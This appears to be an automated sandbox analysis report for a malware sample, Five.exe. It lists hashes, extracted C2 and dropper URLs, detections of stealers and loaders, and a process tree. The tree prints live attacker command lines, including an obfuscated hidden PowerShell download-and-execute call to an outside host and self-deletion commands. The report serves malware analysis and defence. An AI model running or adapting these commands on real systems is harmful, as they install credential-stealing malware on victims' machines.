Analysis

  • max time kernel
    137s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    10-04-2021 13:47

General

  • Target

    Five.exe

  • Size

    347KB

  • MD5

    9bd60d8672e34193a3bb35a09d3d4dc5

  • SHA1

    8ca91b14d95b896a7afe2430830ed88c2700d0ab

  • SHA256

    610d9028a1aac20684ad5bf0b6c0212016eceb3d6d4563cead3c398aac441c5b

  • SHA512

    a4f32f18f54119e1b1dc1d13e8a9ca11695cd4fe66880ce3ccc27679d66d4e7ed08a74a2ddc0dded0534f2af8d5336e4cfd062d6f9359059d9f9a9a03815cd63

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

icedid

Campaign

1925120085

C2

zapatiryesa.fun

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • IcedID First Stage Loader 1 IoCs
  • Blocklisted process makes network request 21 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 5 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 31 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 21 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 16 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:60
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
        PID:1036
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Themes
        1⤵
          PID:1276
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
          1⤵
            PID:1208
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
            1⤵
              PID:1096
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1424
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                  PID:2392
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                  1⤵
                    PID:2436
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                    1⤵
                      PID:2656
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                      1⤵
                        PID:2684
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Browser
                        1⤵
                          PID:2724
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                          1⤵
                            PID:1812
                          • C:\Users\Admin\AppData\Local\Temp\Five.exe
                            "C:\Users\Admin\AppData\Local\Temp\Five.exe"
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3004
                            • C:\Users\Admin\AppData\Local\Temp\UKKSRIAFWU\multitimer.exe
                              "C:\Users\Admin\AppData\Local\Temp\UKKSRIAFWU\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
                              2⤵
                              • Executes dropped EXE
                              • Maps connected drives based on registry
                              • Drops file in Windows directory
                              • Enumerates system info in registry
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2764
                              • C:\Users\Admin\AppData\Local\Temp\UKKSRIAFWU\multitimer.exe
                                "C:\Users\Admin\AppData\Local\Temp\UKKSRIAFWU\multitimer.exe" 1 3.1618062453.6071ac75c7623 105
                                3⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious use of WriteProcessMemory
                                PID:4320
                                • C:\Users\Admin\AppData\Local\Temp\UKKSRIAFWU\multitimer.exe
                                  "C:\Users\Admin\AppData\Local\Temp\UKKSRIAFWU\multitimer.exe" 2 3.1618062453.6071ac75c7623
                                  4⤵
                                  • Executes dropped EXE
                                  • Checks for any installed AV software in registry
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:4396
                                  • C:\Users\Admin\AppData\Local\Temp\foinfaawdh2\3a4so11jiil.exe
                                    "C:\Users\Admin\AppData\Local\Temp\foinfaawdh2\3a4so11jiil.exe" /VERYSILENT
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:4720
                                    • C:\Users\Admin\AppData\Local\Temp\is-H6PGT.tmp\3a4so11jiil.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-H6PGT.tmp\3a4so11jiil.tmp" /SL5="$3022E,140785,56832,C:\Users\Admin\AppData\Local\Temp\foinfaawdh2\3a4so11jiil.exe" /VERYSILENT
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Drops file in Program Files directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of WriteProcessMemory
                                      PID:4756
                                      • C:\Users\Admin\AppData\Local\Temp\is-T1PRT.tmp\apipostback.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-T1PRT.tmp\apipostback.exe" adan adan
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4900
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\N97tfgNnM.dll"
                                          8⤵
                                            PID:1264
                                            • C:\Windows\SysWOW64\regsvr32.exe
                                              regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\N97tfgNnM.dll"
                                              9⤵
                                              • Loads dropped DLL
                                              PID:580
                                              • C:\Windows\system32\regsvr32.exe
                                                /s "C:\Users\Admin\AppData\Local\Temp\N97tfgNnM.dll"
                                                10⤵
                                                • Loads dropped DLL
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:4848
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\N97tfgNnM.dll51aMKTCFM.dll"
                                            8⤵
                                              PID:5884
                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\N97tfgNnM.dll51aMKTCFM.dll"
                                                9⤵
                                                  PID:5004
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                8⤵
                                                  PID:2108
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                    9⤵
                                                    • Blocklisted process makes network request
                                                    PID:6864
                                          • C:\Users\Admin\AppData\Local\Temp\iwmea4mjz5o\px5ycqsshlk.exe
                                            "C:\Users\Admin\AppData\Local\Temp\iwmea4mjz5o\px5ycqsshlk.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:4828
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\iwmea4mjz5o\px5ycqsshlk.exe"
                                              6⤵
                                                PID:4976
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 1.1.1.1 -n 1 -w 3000
                                                  7⤵
                                                  • Runs ping.exe
                                                  PID:1232
                                            • C:\Users\Admin\AppData\Local\Temp\4pfds1eckio\0c41bq5hfhj.exe
                                              "C:\Users\Admin\AppData\Local\Temp\4pfds1eckio\0c41bq5hfhj.exe" /ustwo INSTALL
                                              5⤵
                                              • Executes dropped EXE
                                              PID:4836
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 648
                                                6⤵
                                                • Program crash
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1232
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 664
                                                6⤵
                                                • Program crash
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:4060
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 700
                                                6⤵
                                                • Program crash
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5548
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 816
                                                6⤵
                                                • Program crash
                                                PID:5716
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 816
                                                6⤵
                                                • Program crash
                                                PID:5928
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 948
                                                6⤵
                                                • Program crash
                                                PID:5360
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1092
                                                6⤵
                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                • Executes dropped EXE
                                                • Program crash
                                                • Suspicious use of WriteProcessMemory
                                                PID:5024
                                            • C:\Users\Admin\AppData\Local\Temp\pkp3ttezvv5\KiffApp1.exe
                                              "C:\Users\Admin\AppData\Local\Temp\pkp3ttezvv5\KiffApp1.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4988
                                            • C:\Users\Admin\AppData\Local\Temp\reht4jrs51m\app.exe
                                              "C:\Users\Admin\AppData\Local\Temp\reht4jrs51m\app.exe" /8-23
                                              5⤵
                                              • Executes dropped EXE
                                              PID:5088
                                              • C:\Users\Admin\AppData\Local\Temp\reht4jrs51m\app.exe
                                                "C:\Users\Admin\AppData\Local\Temp\reht4jrs51m\app.exe" /8-23
                                                6⤵
                                                • Modifies data under HKEY_USERS
                                                PID:1576
                                            • C:\Users\Admin\AppData\Local\Temp\ulgrx0ir5qr\vpn.exe
                                              "C:\Users\Admin\AppData\Local\Temp\ulgrx0ir5qr\vpn.exe" /silent /subid=482
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of WriteProcessMemory
                                              PID:4280
                                              • C:\Users\Admin\AppData\Local\Temp\is-9N3KO.tmp\vpn.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-9N3KO.tmp\vpn.tmp" /SL5="$9004C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ulgrx0ir5qr\vpn.exe" /silent /subid=482
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in Program Files directory
                                                • Modifies system certificate store
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of FindShellTrayWindow
                                                PID:4364
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                  7⤵
                                                    PID:4176
                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                      tapinstall.exe remove tap0901
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Checks SCSI registry key(s)
                                                      PID:5104
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                    7⤵
                                                      PID:500
                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                        tapinstall.exe install OemVista.inf tap0901
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Drops file in System32 directory
                                                        • Drops file in Windows directory
                                                        • Checks SCSI registry key(s)
                                                        • Modifies system certificate store
                                                        PID:4616
                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                      7⤵
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:7740
                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                      7⤵
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:7988
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        8⤵
                                                        • Drops file in Program Files directory
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:3012
                                                • C:\Users\Admin\AppData\Local\Temp\cndr502rxol\Setup3310.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\cndr502rxol\Setup3310.exe" /Verysilent /subid=577
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:5068
                                                • C:\Users\Admin\AppData\Local\Temp\e4y0uws4bzv\IBInstaller_97039.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\e4y0uws4bzv\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                  5⤵
                                                    PID:5024
                                                  • C:\Users\Admin\AppData\Local\Temp\k5tumb5y1sa\rfpvo2layxa.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\k5tumb5y1sa\rfpvo2layxa.exe" /quiet SILENT=1 AF=756
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Enumerates connected drives
                                                    • Modifies system certificate store
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:4284
                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\k5tumb5y1sa\rfpvo2layxa.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\k5tumb5y1sa\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617803388 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                                      6⤵
                                                        PID:5660
                                              • C:\Users\Admin\AppData\Local\Temp\CIISTC4ITC\setups.exe
                                                "C:\Users\Admin\AppData\Local\Temp\CIISTC4ITC\setups.exe" ll
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of WriteProcessMemory
                                                PID:3116
                                                • C:\Users\Admin\AppData\Local\Temp\is-NFUOL.tmp\setups.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-NFUOL.tmp\setups.tmp" /SL5="$4007A,2051888,270336,C:\Users\Admin\AppData\Local\Temp\CIISTC4ITC\setups.exe" ll
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Checks computer location settings
                                                  • Loads dropped DLL
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4092
                                            • \??\c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                              1⤵
                                              • Suspicious use of SetThreadContext
                                              PID:1872
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                2⤵
                                                • Drops file in System32 directory
                                                • Checks processor information in registry
                                                • Modifies registry class
                                                PID:4980
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                              1⤵
                                              • Drops file in Windows directory
                                              • Modifies Internet Explorer settings
                                              • Modifies registry class
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of SetWindowsHookEx
                                              PID:2156
                                            • C:\Windows\system32\browser_broker.exe
                                              C:\Windows\system32\browser_broker.exe -Embedding
                                              1⤵
                                              • Modifies Internet Explorer settings
                                              PID:2044
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                              • Modifies registry class
                                              • Suspicious behavior: MapViewOfSection
                                              • Suspicious use of SetWindowsHookEx
                                              • Suspicious use of WriteProcessMemory
                                              PID:1404
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                              • Modifies Internet Explorer settings
                                              • Modifies registry class
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4124
                                            • C:\Users\Admin\AppData\Local\Temp\is-JJVSC.tmp\IBInstaller_97039.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-JJVSC.tmp\IBInstaller_97039.tmp" /SL5="$3022A,9979514,721408,C:\Users\Admin\AppData\Local\Temp\e4y0uws4bzv\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Drops file in Program Files directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of WriteProcessMemory
                                              PID:4336
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                2⤵
                                                • Checks computer location settings
                                                PID:2924
                                              • C:\Users\Admin\AppData\Local\Temp\is-J5503.tmp\{app}\vdi_compiler.exe
                                                "C:\Users\Admin\AppData\Local\Temp\is-J5503.tmp\{app}\vdi_compiler"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:2988
                                            • C:\Users\Admin\AppData\Local\Temp\is-Q2S3O.tmp\Setup3310.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-Q2S3O.tmp\Setup3310.tmp" /SL5="$30232,138429,56832,C:\Users\Admin\AppData\Local\Temp\cndr502rxol\Setup3310.exe" /Verysilent /subid=577
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of FindShellTrayWindow
                                              PID:3104
                                              • C:\Users\Admin\AppData\Local\Temp\is-4G5UI.tmp\Setup.exe
                                                "C:\Users\Admin\AppData\Local\Temp\is-4G5UI.tmp\Setup.exe" /Verysilent
                                                2⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                PID:3000
                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  PID:3628
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:5844
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:5360
                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:4740
                                                  • C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe
                                                    "C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe"
                                                    4⤵
                                                      PID:5824
                                                      • C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe
                                                        "C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks processor information in registry
                                                        PID:5892
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im winxsl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe" & del C:\ProgramData\*.dll & exit
                                                          6⤵
                                                            PID:6260
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im winxsl.exe /f
                                                              7⤵
                                                              • Kills process with taskkill
                                                              PID:6696
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 6
                                                              7⤵
                                                              • Delays execution with timeout.exe
                                                              PID:4316
                                                    • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
                                                      "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Checks whether UAC is enabled
                                                      • Drops file in Program Files directory
                                                      PID:5028
                                                    • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
                                                      "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
                                                      3⤵
                                                        PID:3784
                                                        • C:\Windows\SysWOW64\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                          4⤵
                                                            PID:5312
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                              5⤵
                                                              • Loads dropped DLL
                                                              • Modifies registry class
                                                              PID:5944
                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:3248
                                                          • C:\Users\Admin\AppData\Local\Temp\CL81DXK9H5\multitimer.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\CL81DXK9H5\multitimer.exe" 0 306065bb10421b26.04333812 0 103
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Windows directory
                                                            PID:5624
                                                            • C:\Users\Admin\AppData\Local\Temp\CL81DXK9H5\multitimer.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\CL81DXK9H5\multitimer.exe" 1 3.1618062489.6071ac99c1607 103
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              PID:5164
                                                              • C:\Users\Admin\AppData\Local\Temp\CL81DXK9H5\multitimer.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\CL81DXK9H5\multitimer.exe" 2 3.1618062489.6071ac99c1607
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Checks for any installed AV software in registry
                                                                PID:5748
                                                                • C:\Users\Admin\AppData\Local\Temp\n3aejwwjuw2\Setup3310.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\n3aejwwjuw2\Setup3310.exe" /Verysilent /subid=577
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:6884
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-UEVB6.tmp\Setup3310.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-UEVB6.tmp\Setup3310.tmp" /SL5="$303FA,138429,56832,C:\Users\Admin\AppData\Local\Temp\n3aejwwjuw2\Setup3310.exe" /Verysilent /subid=577
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:6980
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-GEKNQ.tmp\Setup.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-GEKNQ.tmp\Setup.exe" /Verysilent
                                                                      9⤵
                                                                      • Drops file in Program Files directory
                                                                      PID:6468
                                                                • C:\Users\Admin\AppData\Local\Temp\htqbea1udqx\qkthdrfkkoe.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\htqbea1udqx\qkthdrfkkoe.exe" /ustwo INSTALL
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:6908
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 648
                                                                    8⤵
                                                                    • Program crash
                                                                    PID:7264
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 664
                                                                    8⤵
                                                                    • Program crash
                                                                    PID:7440
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 764
                                                                    8⤵
                                                                    • Program crash
                                                                    PID:7756
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 800
                                                                    8⤵
                                                                    • Program crash
                                                                    PID:7916
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 880
                                                                    8⤵
                                                                    • Program crash
